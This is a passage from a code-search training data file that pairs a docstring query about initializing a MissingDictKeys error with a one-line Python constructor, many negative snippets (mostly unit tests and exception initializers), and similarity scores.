session.put(\"{url}/api/roles/{role_id}\".format(url=get_registry_url(), role_id=role_id), json=data)\n\treturn response.json()" ]
[ "0.845486", "0.8306357", "0.8198853", "0.81536174", "0.8034468", "0.8029377", "0.77602434", "0.77323145", "0.7709774", "0.7558279", "0.7468724", "0.7445049", "0.7390456", "0.7355343", "0.7096366", "0.70292366", "0.6925993", "0.68034214", "0.6687161", "0.66808903", "0.66696924", "0.6654415", "0.6651892", "0.66412574", "0.65487653", "0.654516", "0.652529", "0.6512492", "0.6488081", "0.64753973", "0.63922274", "0.63716656", "0.63642764", "0.6346309", "0.6331621", "0.6316578", "0.62372684", "0.61865443", "0.6103885", "0.6089886", "0.6084827", "0.60697067", "0.60540545", "0.6047235", "0.60390997", "0.60233504", "0.60030377", "0.59972215", "0.5994126", "0.5994126", "0.599201", "0.5987439", "0.59696245", "0.59610575", "0.59580815", "0.5954522", "0.59412354", "0.5941112", "0.5940964", "0.59240067", "0.5909084", "0.59006286", "0.5893449", "0.5886986", "0.58796215", "0.5864522", "0.58520585", "0.58421016", "0.5832476", "0.5820839", "0.58187985", "0.5818058", "0.5795759", "0.5791157", "0.57870185", "0.5784493", "0.57758427", "0.57636684", "0.5757033", "0.57513654", "0.57446027", "0.5741854", "0.57414514", "0.5721447", "0.5718519", "0.57035786", "0.5702699", "0.5697638", "0.5693274", "0.56913996", "0.56707466", "0.56634843", "0.5660236", "0.5644013", "0.5642598", "0.5629763", "0.5619007", "0.56129175", "0.56098855", "0.559876" ]
0.7384984
13
Initializes MissingDictKeys with an error message.
def __init__(self, msg: str): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _initialize_error_dictionaries(self):\n for task_id in self.task_ids.keys():\n self.training_errors[task_id] = []\n self.validation_errors[task_id] = []", "def test_missing_mandatory(self):\n try:\n CollectorUpdate()\n self.assertFalse(\"RuntimeError expected\")\n except RuntimeError as exception:\n assert_that(str(exception), equal_to(\"Missing keys: 'stage', 'status', 'timestamp'\"))", "def test_from_empty_dict(self):\n from sosbeacon.event.message import Message\n\n self.assertRaisesRegexp(\n Exception, 'key is required', Message.from_dict, {})", "def testMissingKeys(self):\n self.assertRaises(ValueError,\n self.unauth.table,\n self.dataset,\n self.table)", "def test_throws_item_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n Item.Schema().loads(json.dumps(item_missing_key))", "def _setErrorNodesDict(self, errorDict):\n self._errorDict = errorDict", "def test_set_missing_keys_1(self):\n data_dict = {\"type\":\"add\", \"cluster\":\"\"}\n key_set = set([\"type\", \"host_genus\"])\n tickets.set_missing_keys(data_dict, key_set)\n with self.subTest():\n self.assertEqual(len(data_dict.keys()), 3)\n with self.subTest():\n self.assertEqual(data_dict[\"host_genus\"], \"\")", "def init_failed_tests_dict():\n global g_failed_test_info_dict\n g_failed_tests_info_dict[\"TestName\"] = []\n g_failed_tests_info_dict[\"TestInfo\"] = []", "def _add_missing_keys(self):\n for k, v in self.defaults.items():\n if k not in self.data:\n self.data[k] = v\n\n self.save()", "def __missing__(self, key):\n global MISSING\n MISSING = key # For debugging - save name of missing key\n return INVALID", "def test_dict_with_invalid_version(self):\n\n invalid_version_info = (-1, -1, -1)\n d = LexicalDictionary(invalid_version_info)\n\n with self.assertRaises(FileNotFoundError):\n lp = Lexpp(external_dict=d)", "def test_set_key_filename_missing(self):\n command_line = self._MENU + [self._KEYNAME, \"--keyfile-path\", \"/bogus\"]\n self.check_error(StratisCliKeyfileNotFoundError, command_line, _ERROR)", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def test_init_errors(self):\n t = self.Test({})\n self.assertEqual(t.errors, {})", "def test_set_missing_keys_2(self):\n data_dict = {\"type\":\"add\", \"cluster\":\"\"}\n key_set = set([\"type\", \"cluster\"])\n tickets.set_missing_keys(data_dict, key_set)\n self.assertEqual(len(data_dict.keys()), 2)", "def test_ERRORS(self):\n self.assertIsInstance(constants.ERRORS, dict,\n \"constants.ERRORS must be a dictionary.\")", "def test_keys_failure(self):\n storage = Storage()\n storage._keys_dict = {'1': 'one',\n 'abc': '1'}\n self.assertRaises(StoragePatternError, storage.keys, 'ab[cd')", "def test_missing_entry_raises_KeyError(self):\n with self.assertRaises(KeyError):\n self.phonebook.lookup(\"missing\")", "def test_incorrect_init(self):\n with self.assertRaises(MissingMarkersException) as context:\n self.subject()", "def test_getitem_missing(self, env: yaenv.Env):\n with pytest.raises(yaenv.EnvError) as err:\n _ = env['MISSING']\n assert 'Missing' in str(err.value)", "def provoke_and_handle_KeyError():\n test_dict = {}\n try:\n print(test_dict['to life'])\n except KeyError as ke:\n print(f\"Sorry! The key '{ke}' does not exist in test_dict!\")", "def initialize(self, keys: List[str]):", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n MpiiPCKAccuracy(norm_item='invalid')", "def addErrorNodesDict(self, errorDict):\n self.errorDict.update(errorDict)", "def initializeFromDict(self, inputDict):\n pass", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n JhmdbPCKAccuracy(norm_item='invalid')", "def test_map_missing_key_encountered():\n with pytest.raises(KeyError):\n Map().read_key(10, b\"\")", "def test_overwrite_raises_an_error_by_default(self):\n set_default_for_missing_keys('test')\n\n with pytest.raises(ValueError) as e:\n set_default_for_missing_keys(None)\n\n # confirm that error message correctly indicates the fix/resolution\n assert 'pass `overwrite=True`' in str(e.value)", "def _import_messagekeys(self, local_obj, msg_obj):\n\n # Aggregate MsgKey attributes into a dict.\n msg_dict = {'message': msg_obj.message,\n 'argcount': msg_obj.message.count('%s'),\n '_comps': local_obj._comps + [msg_obj.key],\n 'exception': msg_obj.exception,\n '_msgobj': msg_obj\n }\n\n # Create MessageKey Object and load its attributes\n msgkey_obj = self._MsgKey__class() # Dynamically created in _createErrorMsgKeys()\n msgkey_obj._load(msg_dict)\n msgkey_obj._initialized = True\n\n\n # Assign it to parent LocalKey.\n setattr(local_obj, core_utils.convertAllCaps(msg_obj.key), msgkey_obj)", "def _check_initialized(self):\n self.assertEquals(0, self._error_count)\n self.assertEquals(0, len(self._error_messages))", "def keyError():\n d = {}\n d['cat']", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"%s at %s\" % (msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def test_init(self):\n person = Person('test_person_a')\n self.assertEqual(person.name, 'test_person_a')\n self.assertEqual(person.address, '123 Fake Street')\n self.assertEqual(person.email, 'test@example.com')\n\n with self.assertRaises(KeyError):\n Person('fake_person')", "def _add_error(self, key, message):\n if key not in self._error_key_list:\n self._error_key_list.append(key)\n self.add_error(key, str(message))", "def testBadKeys(self):\n # Ignore access to protected members\n # pylint: disable=W0212\n self.assertRaises(DOLAPI._DOLAPIError,\n self.badauth.table,\n self.dataset,\n self.table)", "def test_keyerror(self):\n try:\n self.db['foo']\n except KeyError, e:\n assert \"no key 'foo' in database <SequenceFileDB\" in str(e), str(e)", "def validate_required_keys(input_dict, filename, required_keys):\n passed = True\n for req_key in required_keys:\n if not input_dict.get(req_key):\n print(\"{}: missing required key {}\".format(filename, req_key))\n passed = False\n return passed", "def test_from_dict_bad_event_key(self):\n from google.appengine.ext import ndb\n\n from sosbeacon.event.event import Event\n from sosbeacon.event.message import Message\n\n event_key = ndb.Key(Event, 1)\n\n self.assertRaisesRegexp(\n Exception, \"Event not found\",\n Message.from_dict, {'event': event_key})", "def __missing__(self, key):\n raise KeyNotInContextError(f\"{key} not found in the pypyr context.\")", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n PCKAccuracy(norm_item='invalid')", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']", "def test_getitem_error(self):\n with self.assertRaises(KeyError):\n self.tester['Not_a_Sample']", "def __init__(self, key, parent=None):\n if parent:\n msg = f\"Missing config while rendering {parent}: {key}\"\n else:\n msg = f\"Missing config: {key}\"\n super(MissingConfiguration, self).__init__(msg)", "def record_error(self, message, keys=None, type=None, **kwargs):\n keys = list(keys) if keys is not None else []\n self.errors.append(\n dict(\n message=message,\n keys=keys,\n type=type or EntityErrors.UNCATEGORIZED,\n **kwargs\n )\n )", "def check_initialized(self):\n for name, field in self.__by_name.items():\n value = getattr(self, name)\n if value is None:\n if field.required:\n raise ValidationError(\n \"Message %s is missing required field %s\" %\n (type(self).__name__, name))\n else:\n try:\n if (isinstance(field, MessageField) and\n issubclass(field.message_type, Message)):\n if field.repeated:\n for item in value:\n item_message_value = field.value_to_message(\n item)\n item_message_value.check_initialized()\n else:\n message_value = field.value_to_message(value)\n message_value.check_initialized()\n except ValidationError as err:\n if not hasattr(err, 'message_name'):\n err.message_name = type(self).__name__\n raise", "def _import_basekey(self, page_module, basekey):\n\n basepage_obj = getattr(page_module, basekey.lower())\n raw_dict = util._getErrmsgData(basepage_obj)\n\n attr, lcl_keys = raw_dict['attributes'], raw_dict['local_keys']\n\n basekey_dict = dict([(k, v) for k, v in attr] + # Load all Attributes\n zip(['_keys', '_comps'],\n [[core_utils.convertAllCaps(x[0]) for x in lcl_keys] or [], # local_keys\n [basekey]])) # components\n\n Basekey = self._BaseKey__class() # Dynamically created in _createErrorMsgKeys()\n\n Basekey._load(basekey_dict)\n\n # Assign BaseKey object to ErrMsg (self)\n setattr(self, basekey, Basekey)\n\n return Basekey, lcl_keys", "def testInitEmpty():\n conf = naiveConf.NaiveConf()\n with pytest.raises(KeyError):\n print conf.x\n conf.x = 5\n assert conf.x == 5", "def test_no_such_key():\n test = [{'key': 'val1'}, ['missing']]\n t_result = fetch_data_by_keys(*test)\n assert not is_successful(t_result)\n assert 'missing' in str(t_result.failure())", "def test_throws_base_price_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n BasePrice.Schema().loads(json.dumps(base_price_missing_key))", "def _get_missing_keys(self):\n REQUIRED_KEYS = [\n 'date_purchased', 'cost', 'supply_type_id'\n ]\n\n return [key for key in REQUIRED_KEYS if not key in self.request.data]", "def on_init_fail(self, event_time, message):\n pass", "def test_raises_on_missing_needed_fields(self):\n test_name = \"impossible_creature_not_present\"\n self.form.constructor_fields = [*self.form.constructor_fields, test_name]\n message = \"The fields for email, username, and constructor must be set in fields. \"\n self.assertNotIn(test_name, self.form.base_fields)\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.confirm_required_fields()", "def test_init__no_sdk_key_no_datafile__fails(self, _):\n self.assertRaisesRegex(\n optimizely_exceptions.InvalidInputException,\n enums.Errors.MISSING_SDK_KEY,\n config_manager.PollingConfigManager,\n sdk_key=None,\n datafile=None,\n )", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n PrepSample('Not_a_Sample', self.prep_template)", "def initializeDict():\n ret = libxml2mod.xmlInitializeDict()\n return ret", "def get_or_raise(self, key: str, error_message: str = None) -> str:\n v = self.get_or_default(key, None)\n if v is None:\n if error_message is None:\n print(\"Error, '\" + key + \"' is required.\")\n else:\n print(error_message)\n raise CLIMissingKeyError(error_message)\n\n else:\n return v", "def param_dict_initialization(self):\n return NotImplemented", "def test_set_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"] = \"value\"", "def test_get_invalid_key(self):\n pairs = {'library': '~/home/documents/dms',\n 'key': 'value',\n }\n exceptionKeys = ['Hello', 'spam']\n try:\n tempconfig = tempfile.NamedTemporaryFile(\n suffix=\".yaml\", delete=False)\n tempconfig.write('ham: eggs'.encode('UTF-8'))\n tempconfig.close()\n config = easydms.config.Config(tempconfig.name)\n\n for key, value in pairs.items():\n self.assertEqual(config.getKey(key, value), value)\n\n for key in exceptionKeys:\n with self.assertRaises(easydms.config.ErrorConfigKeyNotFound):\n config.getRequiredKey(key)\n finally:\n os.remove(tempconfig.name)", "def test_raises_if_initial_fieldsets_error(self):\n original_fieldsets = self.form.fieldsets\n test_fieldsets = (\n ('Your Name', {\n 'position': 1,\n 'fields': [('first_name', 'last_name', )],\n }),\n (None, {\n 'classes': ('counting', ),\n 'position': 2,\n 'fields': [\n ('first', 'second', ),\n 'last',\n ],\n }), )\n position_missing_fieldsets = deepcopy(test_fieldsets)\n del position_missing_fieldsets[1][1]['position']\n fields_missing_fieldsets = deepcopy(test_fieldsets)\n del fields_missing_fieldsets[0][1]['fields']\n message = \"There must be 'fields' and 'position' in each fieldset. \"\n self.form.fieldsets = position_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n self.form.fieldsets = fields_missing_fieldsets\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.make_fieldsets()\n\n self.form.fieldsets = original_fieldsets", "def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,\n missing_keys, unexpected_keys, error_msgs):\n module_names = ['backbone', 'neck', 'roi_head', 'rpn_head']\n for key in list(state_dict):\n for module_name in module_names:\n if key.startswith(module_name) and ('img_' +\n key) not in state_dict:\n state_dict['img_' + key] = state_dict.pop(key)\n\n super()._load_from_state_dict(state_dict, prefix, local_metadata,\n strict, missing_keys, unexpected_keys,\n error_msgs)", "def test_checkmarx_init_key_missing_error(self, mock_url_read, mock_error):\n # pylint: disable=protected-access\n mock_url_read.return_value = '{}'\n marx = Checkmarx(url='http://url', username='un', password='pwd') # nosec\n\n self.assertIsNotNone(marx)\n mock_url_read.assert_called_once_with(\n 'http://url/cxrestapi/auth/identity/connect/token',\n post_body=b'username=un&password=pwd&scope=sast_rest_api&grant_type=password&'\n b'client_id=resource_owner_client&client_secret=014DF517-39D1-4453-B7B3-9930C563627C')\n self.assertEqual(mock_error.call_args[0][0], \"Couldn't load access token from json: %s.\")\n self.assertIsInstance(mock_error.call_args[0][1], KeyError)\n self.assertEqual(ssl._create_default_https_context, ssl._create_unverified_context)", "def _initalize_mapping():\n linter = lint.PyLinter()\n linter.load_defaults()\n linter.load_default_plugins()\n\n mapping = {\n message.msgid: message.symbol\n for message in linter.msgs_store.messages\n }\n\n return mapping", "def test_wrong_init(self):\n xknx = XKNX()\n knxipframe = KNXIPFrame(xknx)\n with pytest.raises(AttributeError):\n knxipframe.init(23)\n\n with pytest.raises(CouldNotParseKNXIP):\n # this is not yet implemented in xknx\n knxipframe.init(KNXIPServiceType.SEARCH_REQUEST_EXTENDED)", "def _check_errors(self, json_loaded):\n\n content = json_loaded\n try:\n m = content[u'error'][u'message']\n c = content[u'error'][u'code']\n out= \"API Error code: {}\\nError message: {}\".format(c, m)\n raise InvalidQueryException(self.name, out)\n except KeyError:\n pass", "def _check_keys(setting_dict):\n for key in SettingContainer.key_list:\n if not key in setting_dict:\n raise Exception(\n f\"No value for {key} found in language-settings\")", "def test_load_non_existing_help_nc_params(self) -> None:\n with self.assertRaises(FileNotFoundError):\n load_help_nc_params(\"unknown_param\")", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n SampleTemplate(2)", "def test_error_on_missing_application_key(self):\n parser = Configuration()\n exception = self.assertRaises(ConfigurationError,\n parser._applications_from_configuration,\n {})\n self.assertEqual(\n \"Application configuration has an error. \"\n \"Missing 'applications' key.\",\n exception.message\n )", "def init_matches_errors(self) -> None:\n\n self.matches = set()\n self.ignored = set()\n self.errors = set()", "def test_raise_on_missing_critical(self):\n name_for_field = 'absent_field'\n field_opts = {'names': (name_for_field, 'absent'), 'alt_field': '', 'computed': False}\n critical_fields = {'absent_field': field_opts}\n with self.assertRaises(ImproperlyConfigured):\n self.form.fields_for_critical(critical_fields)", "def setup_dict(data, required=None, defaults=None):\n required = required or []\n for i in set(required) - set(data):\n raise IndexError(\"Missed: %s\" % i)\n\n defaults = defaults or {}\n for i in set(data) - set(required) - set(defaults):\n raise ValueError(\"Unexpected: %s\" % i)\n\n defaults.update(data)\n return defaults", "def setup_dict(data, required=None, defaults=None):\n required = required or []\n for i in set(required) - set(data):\n raise IndexError(\"Missed: %s\" % i)\n\n defaults = defaults or {}\n for i in set(data) - set(required) - set(defaults):\n raise ValueError(\"Unexpected: %s\" % i)\n\n defaults.update(data)\n return defaults", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def testNotExistingPath(self):\n with h5py.File(self.h5_fname, 'a') as f:\n f['data'] = 1\n\n ddict = h5todict(self.h5_fname, path=\"/I/am/not/a/path\", errors='ignore')\n self.assertFalse(ddict)\n\n with LoggingValidator(dictdump_logger, error=1):\n ddict = h5todict(self.h5_fname, path=\"/I/am/not/a/path\", errors='log')\n self.assertFalse(ddict)\n\n with self.assertRaises(KeyError):\n h5todict(self.h5_fname, path=\"/I/am/not/a/path\", errors='raise')", "def validate_inputs(self, input_dict):\n required_keys = {\n 'start_delay_hours',\n 'mission_time_hours',\n 'critical_wind_speed_m_per_s',\n 'wind_height_of_interest_m',\n 'wind_shear_exponent',\n 'weather_window'\n }\n found_keys = set(input_dict.keys())\n if len(required_keys - found_keys) > 0:\n err_msg = '{}: did not find all required keys in inputs dictionary. Missing keys are {}'\n raise ValueError(err_msg.format(type(self).__name__, required_keys - found_keys))", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n Sample('Not_a_Sample', self.sample_template)", "def __setup__(cls):\n super(Country, cls).__setup__()\n cls._error_messages.update({\n 'country_not_found': 'Country with ISO code %s does not exist.',\n })", "def _failOnMissingActiveNuclides(missingActiveNuclides):\n msg = \"Missing active nuclides in loading file. Add the following nuclides:\"\n for i, nucList in enumerate(missingActiveNuclides, 1):\n msg += \"\\n {} - \".format(i) # Index of\n for j, nuc in enumerate(nucList, 1):\n delimiter = \" or \" if j < len(nucList) else \"\"\n msg += \"{}{}\".format(nuc, delimiter)\n raise ValueError(msg)", "def __init__(self, cfg: RAW_CFG, keyvals: Mapping[str, Any], *args, **kwargs) -> None:\n super().__init__(cfg, *args, **kwargs)\n\n for k in self.INDEX_KEYS:\n if k not in keyvals:\n raise ConfigException(f\"Key value {k} missing from keyvals: {keyvals!r}\")\n self.keyvals = keyvals", "def test_init_unknown_error(self):\n with self.assertRaises(QiitaDBUnknownIDError):\n PrepTemplate(2)", "def error(self, key, **kwargs):\n try:\n msg = self.error_messages[key]\n except KeyError:\n class_name = self.__class__.__name__\n raise AssertionError('Error with key={} is not found for class={}'.format(key, class_name))\n message_string = msg.format(**kwargs)\n raise ValidationError(message_string, code=key)", "def init_dict(self, train_data, dict_ord=None):\n raise NotImplementedError()", "def dictionary_should_not_contain_key(self,dictionary,key,msg=None):\r\n default = \"Dictionary contains key '%s'\" %key\r\n _verify_condition(not dictionary.has_key(key),default,msg)", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def test_error_on_missing_version_key(self):\n config = dict(applications={})\n parser = Configuration()\n exception = self.assertRaises(ConfigurationError,\n parser._applications_from_configuration,\n config)\n self.assertEqual(\n \"Application configuration has an error. \"\n \"Missing 'version' key.\",\n exception.message\n )", "def _check_keys(dict):\n for key in dict.keys():\n if isinstance(dict[key], sio.matlab.mio5_params.mat_struct):\n dict[key] = _todict(dict[key])\n return dict", "def test_initialize_handles_errors(self):\n self.assertEqual(list(self.registry), [])\n\n item1 = self.DummyItem(123)\n item2 = self.DummyItem(123)\n\n with self.assertRaises(AlreadyRegisteredError):\n self.hook_cls(self.extension, [item1, item2])\n\n self.assertEqual(list(self.registry), [])", "def test_with_missing_required_fields(data_store_path, missing_fields):\n data_store = YAMLDataStore(file_path=str(data_store_path))\n user = {\"name\": \"Eric Idle\", \"phone\": \"123-456-7890\", \"address\": \"here\"}\n for missing_field in missing_fields:\n del user[missing_field]\n\n with pytest.raises(InvalidUserError) as error:\n data_store.create(user)\n\n error_msg = str(error.value)\n for missing_field in missing_fields:\n assert missing_field in error_msg", "def test_key_no_data(self):\n key = Key({})\n\n assert key.warning is None\n assert key.in_car is None", "def missing_data(self, data):\n missing_fields = []\n for key in data:\n if not key in request.json:\n missing_fields.append(key)\n if missing_fields:\n message = 'Missing ' + ', '.join(missing_fields)\n return self.bad_request(message)\n return None", "def __init__(self):\n try:\n # Use pkg_resources to support Windows and Unix file paths\n # and find relative module path for file\n file_to_open = resource_string(__name__, self.FILE)\n self.errors = json.loads(file_to_open)\n\n except ResolutionError as e:\n print(e)\n self.errors = dict()", "def test_get_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"]", "def test_process_args_should_reject_missing_units(self, arg_dict):\n with pytest.raises(KeyError):\n change_resolution.process_args(arg_dict)", "def test_blank_key(self):\n with self.assertRaises(ConfigError) as cm:\n imageroller.main.read_authconfig(\n imageroller.test.get_config_parser(self._blank_key))\n self.assertEqual(str(cm.exception), \"AuthConfig must contain ApiKey\")", "def missingvalue(message):\n raise jinja2.UndefinedError(message)", "def test_invalid_key(self):\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('221b=\"starts with number\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('_=\"not assignable\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('o-o=\"invalid character\"')\n assert 'Invalid key' in str(err.value)", "def test_get_error_data_table_when_no_errors(self):\n field_setup = None\n error_names = ['non-field_name', 'not_a_field']\n prepared_info = self.setup_error_data(field_setup, error_names, True)\n for row in prepared_info:\n self.assertEqual(row['expected'], row['actual'])" ]
[ "0.6115417", "0.6019149", "0.5846607", "0.58035153", "0.56639206", "0.56505346", "0.56354576", "0.56103414", "0.5606163", "0.5584499", "0.55501634", "0.5543524", "0.55091983", "0.55001175", "0.54870623", "0.5441635", "0.54101694", "0.5374049", "0.5367004", "0.5310237", "0.52992076", "0.52906936", "0.528019", "0.52739465", "0.52651757", "0.5261097", "0.5246999", "0.52468425", "0.52216613", "0.5209104", "0.52079844", "0.5206169", "0.52020687", "0.52020687", "0.52020687", "0.51985836", "0.5193266", "0.51240754", "0.51237833", "0.51077104", "0.509966", "0.5086445", "0.5063306", "0.5061311", "0.5061311", "0.50595224", "0.5039204", "0.5030843", "0.50282735", "0.50271875", "0.5013878", "0.50130737", "0.50099003", "0.498505", "0.49822018", "0.4980406", "0.49775887", "0.497435", "0.49448523", "0.49442324", "0.49388805", "0.4936826", "0.49344063", "0.49230748", "0.49217063", "0.49205714", "0.48937842", "0.48722747", "0.48712555", "0.48708254", "0.48598027", "0.48585424", "0.48583955", "0.48527047", "0.48523563", "0.48523563", "0.48429546", "0.48419335", "0.48374155", "0.483572", "0.48149192", "0.48146898", "0.48105952", "0.48097214", "0.48093045", "0.4801977", "0.48018736", "0.48013112", "0.47976455", "0.47966486", "0.47903576", "0.47861025", "0.47856033", "0.47756016", "0.47728083", "0.47687173", "0.47669154", "0.4765693", "0.47646478", "0.47603044", "0.47595772" ]
0.0
-1
Initializes MissingGraphicSettings with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_invalidated(self):\n # GTK Settings for evogtk\n self.set_property('image',self.__errorimg)", "def init_load_working_config(self):\n try:\n self.currentconfig = remgeom.load(mustexist=True)\n except remgeom.RemGeomError:\n QtWidgets.QMessageBox.information(self, \"No working config\", \"No working config, you may want to create one\");\n return\n self.set_title()\n self.redisp_config()\n self.updateUI()", "def error(self, message):\n self._clear()\n print(\"ERROR:\", message)\n self._draw()", "def error(self, message):\n raise io_mp.ConfigurationError(message)", "def __init__(self, g, msg):\n self.graph = g\n self.message = 'Graph ' + repr(self.graph) + ' error: ' + msg", "def __init__(self, message='', path=(), notes=()):\n self.message = message\n self.plain_message = message # for backwards compat\n self.path = list(path)\n self.notes = notes\n super(PlotlyGraphObjectError, self).__init__(message)", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def on_init_fail(self, event_time, message):\n pass", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def __init__(self, message=\"\"):\n super(AutomationError, self).__init__(message)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, key, parent=None):\n if parent:\n msg = f\"Missing config while rendering {parent}: {key}\"\n else:\n msg = f\"Missing config: {key}\"\n super(MissingConfiguration, self).__init__(msg)", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def initErrMsgImage(self):\n draw = ImageDraw.Draw(self.errMsgImage)\n # Outline\n draw.rectangle((0,0,self.width-1,self.height-1),outline=255,fill=0)\n # Stripes\n nLines = 8\n lineSlope = self.height/2\n for i in range(0,nLines):\n x0 = i*self.width/(2*nLines)\n y0 = 0\n x1 = x0 - lineSlope\n y1 = self.height\n draw.line((x0,y0,x1,y1),fill=255)\n # Text box\n x0 = self.width/4\n y0 = 0\n x1 = self.width-1\n y1 = self.height-1\n draw.rectangle((x0,y0,x1,y1),outline=255,fill=0)\n # Error symbols\n x0 = self.width/16\n y0 = 3*self.height/4\n x1 = 3*self.width/16\n y1 = y0\n x2 = (x0 + x1)/2\n y2 = self.height/4\n draw.polygon((x0,y0,x1,y1,x2,y2),outline=255,fill=255)\n draw.text((x0+6,y2+5),'!',font=self.font,fill=0)\n return", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def _error(self, message):\r\n dlg = wx.MessageDialog(self, message,\r\n 'xmi2magik',\r\n wx.OK | wx.ICON_ERROR\r\n )\r\n dlg.ShowModal()\r\n dlg.Destroy()", "def _raise_settings_not_found():\n result = click.ClickException(\n 'there is no settings file. Use `pulp-smash settings create` to '\n 'create one.'\n )\n result.exit_code = -1\n raise result", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def _initialize_fill_color_if_not_initialized(self) -> None:\r\n if hasattr(self, '_fill_color'):\r\n return\r\n self._fill_color = String('')", "def initErrorCheck(self):\n #setup pvs to check\n self.error_bcs = \"BCS:MCC0:1:BEAMPMSV\"\n self.error_mps = \"SIOC:SYS0:ML00:CALCOUT989\"\n self.error_gaurdian = \"SIOC:SYS0:ML00:AO466\"\n self.error_und_tmit = \"BPMS:UND1:3290:TMITTH\"\n\n #pv to bypass the error pause\n self.error_bypass = \"SIOC:SYS0:ML00:CALCOUT990\"\n self.error_tripped = \"SIOC:SYS0:ML00:CALCOUT991\"\n\n #set the unlatch pv to zero\n epics.caput(self.error_bypass, 0)\n epics.caput(self.error_tripped,0)", "def test_init_errors(self):\n t = self.Test({})\n self.assertEqual(t.errors, {})", "def after_init(self) -> None:\n if self.options.format.lower() != \"default_notebook\":\n self.error_format = self.options.format\n if not hasattr(self, \"color\"):\n self.color = True", "def set_error(errTxt):\r\n core.set_item_color(\"Start\", mvGuiCol_Button, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonActive, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonHovered, (255, 0, 0, 255))\r\n if not core.does_item_exist(\"Error##ErrorNoFACEITName\"):\r\n with simple.collapsing_header(\"Error##ErrorNoFACEITName\", parent=\"##GroupStats\",\r\n default_open=True,\r\n closable=False,\r\n bullet=True):\r\n core.add_text(\"ErrorText\", default_value=errTxt, color=(255, 0, 0, 255))", "def __init__(self, init_val):\n self.err_fig_num = init_val\n self.disp_fig_num = init_val", "def test_missing_tags_settings(self, settings):\n def _error(*args, **kwargs):\n raise AttributeError\n\n settings.MADCAP_FLARE_ROOT = 'https://www.example.com/'\n error = MagicMock()\n error.side_effect = _error\n settings.MADCAP_FLARE_TAGS.__get__ = error\n\n self.assertRaises(\n ImproperlyConfigured,\n tags.madcap_flare_help,\n {'help_key': 'test-flare'})", "def test_missing_root_setting(self, settings):\n def _error(*args, **kwargs):\n raise AttributeError\n\n error = MagicMock()\n error.side_effect = _error\n\n settings.MADCAP_FLARE_ROOT.__get__ = error\n\n self.assertRaises(\n ImproperlyConfigured,\n tags.madcap_flare_help,\n {'help_key': 'test-flare'})", "def initGUI(self):\n\n\t\t# Set window's title\n\t\tself.parent.title(\"Error Message\")\n\t\t# Creat frames that contain messages and buttons \n\t\tself.buttonFrame = Frame(self.parent)\n\t\tself.buttonFrame.pack(fill = BOTH, expand = True)\n\t\tmessageFrame = 